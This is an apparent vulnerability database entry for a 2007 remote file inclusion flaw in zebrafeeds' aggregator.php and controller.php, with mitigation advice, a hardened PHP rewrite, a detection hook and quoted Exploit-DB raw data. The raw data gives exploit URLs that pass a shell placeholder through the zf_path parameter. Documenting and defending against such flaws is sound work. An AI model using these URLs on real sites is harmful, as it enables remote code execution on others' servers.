Vendor: Unknown
By: ThE dE@Th (AsB-MaY DiScOvEr ExPlIoTs Gr0uP)
CVSS: 5.5 (MEDIUM)
CWE: 98 (Remote File Inclusion)
Product Name: Unknown
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Date: 2007

Remote File Inclusion in aggregator.php and controller.php

The vulnerability allows an attacker to include a remote file through the aggregator.php and controller.php scripts. Both scripts use the 'zf_path' parameter, without validation, as the prefix of the paths passed to require_once(); an attacker who controls that parameter can make the scripts include a file of their choosing and so execute arbitrary code on the server.

Mitigation:

Update the affected scripts so that the value used as the include prefix is validated and sanitized before any file is included; 'zf_path' must not be taken unchecked from user input.
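The following is an added illustration, not code from the zebrafeeds project: it places the vulnerable include pattern reported for aggregator.php beside a hardened version in which the base directory is fixed server-side and every include target is checked to lie inside it. The function names, the ZF_BASE constant and the regular expression are assumptions of this example.

```php
<?php
// Added example for this entry; it is not part of the zebrafeeds code base.
// It contrasts the include pattern reported in aggregator.php/controller.php
// with a hardened version that never builds an include path from request data.

// VULNERABLE (the pattern quoted in the raw data): $zf_path is used unchecked
// as the prefix of every include. If a client can set it, require_once() will
// load whatever path or URL it names, which is the remote file inclusion.
function zf_bootstrap_vulnerable()
{
    global $zf_path;
    require_once($zf_path . 'includes/feed.php');
    require_once($zf_path . 'includes/view.php');
    require_once($zf_path . 'includes/template.php');
}

// HARDENED: the base directory is a constant derived from the script's own
// location, so no request parameter can influence it (assumed name ZF_BASE).
define('ZF_BASE', realpath(__DIR__) . DIRECTORY_SEPARATOR);

function zf_require(string $relative): void
{
    // Only simple relative names are accepted: letters, digits, '_', '.', '/'
    // and no '..' segments, so the value cannot reach outside ZF_BASE.
    if (!preg_match('#^(?!.*(^|/)\.\.(/|$))[A-Za-z0-9_./]+$#', $relative)) {
        throw new InvalidArgumentException("refusing include of '$relative'");
    }
    // realpath() resolves symlinks and returns false for missing files, so the
    // prefix comparison below is against the real on-disk location.
    $target = realpath(ZF_BASE . $relative);
    if ($target === false || strncmp($target, ZF_BASE, strlen(ZF_BASE)) !== 0) {
        throw new RuntimeException("include target outside application: $relative");
    }
    require_once $target;
}

// A request that still carries zf_path is treated as a probe and rejected
// before any include runs; log it so the attempt is visible in monitoring.
if (isset($_REQUEST['zf_path'])) {
    error_log('zebrafeeds: client-supplied zf_path rejected from ' . ($_SERVER['REMOTE_ADDR'] ?? 'unknown'));
    http_response_code(400);
    exit;
}

zf_require('includes/feed.php');
zf_require('includes/view.php');
zf_require('includes/template.php');
zf_require('magpierss/rss_fetch.inc');
```

The log line gives a detection hook: a web server or SIEM rule on requests carrying a zf_path parameter flags scanning for this issue even on patched hosts.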

Exploit-DB raw data:

To ConTacT mE @ wWw.Asb-May.net/bb
ScRiPt:-http://cazalet.org/zebrafeeds/releases/zebrafeeds-current.zip
Discovered By:- ThE dE@Th <<{AsB-MaY DiScOvEr ExPlIoTs Gr0uP}>>
******************************************************************************
aggregator.php:-
require_once($zf_path . 'includes/feed.php');
require_once($zf_path . 'includes/view.php');
require_once($zf_path . 'includes/template.php');
require_once($zf_path . 'magpierss/rss_fetch.inc');

controller.php:-
require_once($zf_path . 'includes/template.php');
require_once($zf_path . 'includes/opml.php');

********************************************************************************
ExPlOiT:-http://www.SitE.com/newsfeeds/includes/aggregator.php?zf_path=[Shell]
ExPlOiT:-http://www.SitE.com/newsfeeds/includes/controller.php?zf_path=[Shell]
*******************************************************************************

# milw0rm.com [2007-02-15]